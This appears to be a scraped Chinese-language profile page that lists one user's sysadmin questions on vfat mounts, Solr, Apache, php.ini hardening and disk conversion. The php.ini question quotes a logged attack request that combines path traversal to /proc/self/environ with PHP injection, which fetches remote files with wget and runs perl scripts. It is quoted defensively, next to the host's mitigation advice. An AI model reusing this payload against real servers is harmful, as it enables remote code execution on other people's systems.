小编Sat*_*hat的帖子

35
推荐指数
6
解决办法
8万
查看次数

如何在 Linux 上以 root 以外的所有权挂载 vfat 驱动器?

我在新升级的 Debian Squeeze 上安装 iPod 时遇到问题。我怀疑要么是协议发生了变化,要么是我发现了一个错误,我不知道该向哪里报告。

我正在尝试安装 iPod,以便我有权读取和写入它。但我的努力落空了:

$ sudo mount -v -t vfat -o uid=32074,gid=6202 /dev/sde2 /mnt
/dev/sde2 on /mnt type vfat (rw,uid=32074,gid=6202)
$ ls -l /mnt
total 80
drwxr-xr-x 2 root root 16384 Jan  1  2000 Calendars
drwxr-xr-x 2 root root 16384 Jan  1  2000 Contacts
drwxr-xr-x 2 root root 16384 Jan  1  2000 Notes
drwxr-xr-x 3 root root 16384 Jun 23  2007 Photos
drwxr-xr-x 6 root root 16384 Jun 19  2007 iPod_Control
$ sudo umount /mnt
$ …
Run Code Online (Sandbox Code Playgroud)

linux mount debian-squeeze

5
推荐指数
1
解决办法
4069
查看次数

为什么 solr 管理面板没有显示?

我已经从这里下载了 solr并解压了它。然后转到示例目录中apache-solr-3.1.0/solr/example并运行此命令

java -jar start.jar
Run Code Online (Sandbox Code Playgroud)

但是当我打开 http://localhost:8983/solr/admin/

它是这样显示的

HTTP 错误:404 访问 /solr/admin/ 时出现问题。

原因:

未找到

由 Jetty 提供支持://

我正在使用 Ubuntu 11.04。为什么会出现这个问题?

jetty solr

5
推荐指数
1
解决办法
1万
查看次数

如何保护服务器免受 http 身份验证的暴力破解?

我有一个 CentOS/Apache 服务器,带有一个经典的 .htaccess 登录/密码系统(authtype basic 等...)

我有 fail2ban 并且我的 iptables 设置为防止 sshd 攻击,但我不知道如何应对试图强制对我的 docroot 进行身份验证的常规 http post 请求。

AFAIK,(我错了吗?)这些尝试没有出现在lastb所以fail2ban 不能真正做太多是请求的数量是合理的

security apache-2.2

5
推荐指数
1
解决办法
1745
查看次数

配置 php.ini 以防止攻击

我在共享主机服务器(heartinternet)上受到攻击,他们说我应该php.ini正确配置自己的文件。

好吧,我有一个带有注册功能的小 php/MySQL 程序,一个小的管理站点,但是有人破解了它。

配置php.ini文件以防止此类攻击的一般方法是什么?任何好的设置将不胜感激。

这是我从网络主机提供商那里得到的:


121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "<?php echo \"j13mb0t#\"; passthru('wget http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http ://some . thesome . com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget
http ://some . thesome . com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"
Run Code Online (Sandbox Code Playgroud)

由于脚本注入攻击的是站点代码本身,因此能够完全规避网络服务器的安全。不幸的是,一些内容管理系统(尤其是旧版本的 Joomla)极易受到这种形式的攻击。

消除攻击者使用此方法的能力的一种简单方法是在网站的顶层添加一个 php.ini 文件,其中包含以下内容 - 但请注意,该网站将需要事后测试以确保没有合法的网站脚本操作已受到更改的影响:

php.ini 指令是...

allow_url_include = "0"
allow_url_fopen = "0"
Run Code Online (Sandbox Code Playgroud)

php php.ini

3
推荐指数
1
解决办法
1839
查看次数

设置 Apache 以使用多核

最近我购买了一台运行 Ubuntu 10.04 和 Apache 的 6 核服务器。您如何设置 apache 以使用所有 6 个内核以及执行此操作的最佳实践是什么?

是否可能,如果可能,是否与以下内容有关(这些不是我的设置)?

<IfModule prefork.c> 
StartServers 10 
MinSpareServers 10 
MaxSpareServers 20 
ServerLimit 1500 
MaxClients 1500 
MaxRequestsPerChild 4000 
</IfModule>

<IfModule worker.c> 
StartServers 2 
MaxClients 150 
MinSpareThreads 25 
MaxSpareThreads 75 
ThreadsPerChild 25 
MaxRequestsPerChild 0 
</IfModule> 
Run Code Online (Sandbox Code Playgroud)

干杯

这是我目前的配置

# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads …
Run Code Online (Sandbox Code Playgroud)

linux multi-core apache-2.2

3
推荐指数
1
解决办法
2万
查看次数

在 Redhat Linux 下只为一个用户安装 Java?

是否可以在 Linux(特别是 RH 7.x)上安装 JDK,使其仅存在于特定用户的空间中?

linux redhat java user-accounts

1
推荐指数
1
解决办法
2726
查看次数

将 ext4 分区转换为 NTFS

有没有工具或命令来实现它?我在这里搜索了一些我没有找到答案。那可能吗?

我必须提到我要转换的 ext4 驱动器有数据,所以它必须只转换它而不是格式化它

ext4 ntfs convert

0
推荐指数
1
解决办法
9067
查看次数